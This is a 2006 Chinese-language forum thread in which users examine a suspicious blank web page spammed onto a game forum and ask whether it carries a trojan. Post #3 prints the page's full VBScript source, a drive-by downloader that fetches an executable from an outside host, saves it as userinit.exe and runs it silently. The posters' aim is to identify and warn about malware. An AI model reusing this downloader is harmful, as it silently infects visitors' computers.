|
|
|
#1
2006-09-30, 11:02 PM
|
||||
|
||||
這個網頁內是否含有木馬?
我在我的一個遊戲論壇上發現有許多不同的大陸ID發表一些看似正常的文章,但卻附了一個奇怪的連結,連過去其實一片空白,可是原始碼內卻有奇怪的東西。我懷疑是用來盜帳號的木馬,不知哪位可以判斷一下?
我不知有無風險,我連過去時只看到空白,我裝的卡巴斯未示警,而微軟的defender似乎也沒什麼動作。 好奇的人請自行參酌風險。 http://www.78xian.com/t1/os.htm 剛才又發現一個新註冊者才貼一篇文章,所附的連結網頁就有木馬,卡巴斯基嚎叫了一聲!真是什麼年頭? 
|
|
#2
2006-09-30, 11:59 PM
|
||||
|
||||
|
呵呵,是一個JS腳本,第三行不就告訴了答案,是下載一個281KB的文檔,是一個自解壓縮包,執行會打開一張正常的圖片,并送一衹木馬
|
|
#3
2006-10-01, 05:19 AM
|
||||
|
||||
|
這是那個網頁的原始檔,請問這裡面是幹什麼的?
哪個是木馬? HTML 代碼:
<html> <script language="VBScript"> on error resume next '1 dl ="http://www.78xian.com/t1/svchos.exe" '1 Set df = document.createElement("object") '1 df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36" '1 str="Microsoft.XMLHTTP" '1 Set x = df.CreateObject(str,"") '1 a1="Adodb." a4="Stream" '1 str1=a1&a4 str5=str1 '1 set S = df.createobject(str5,"") '1 S.type = 1 str6="GET" '1 x.Open str6, dl, False x.Send '1 fname1="userinit.exe" '1 set F = df.createobject("Scripting.FileSystemObject","") '1 set tmp = F.GetSpecialFolder(2) '1 fname1= F.BuildPath(tmp,fname1) '1 S.open '1 S.write x.responseBody '1 S.savetofile fname1,2 '1 S.close '1 set Q = df.createobject("Shell.Application","") '2 Q.ShellExecute fname1,"","" '1 </script></html>
|
|
#4
2006-10-03, 09:48 PM
|
|||
|
|||
|
應該是這一段吧, 不過我想應該沒人想冒險去裝吧..
 代碼:
dl ="http://www.78xian.com/t1/svchos.exe" http://www.ithome.com.tw/plog/index....903&blogId=484
|
|
#5
2006-10-03, 11:32 PM
|
||||
|
||||
|
引用:
|
|
#7
2006-10-04, 04:50 PM
|
||||
|
||||
|
引用:
|
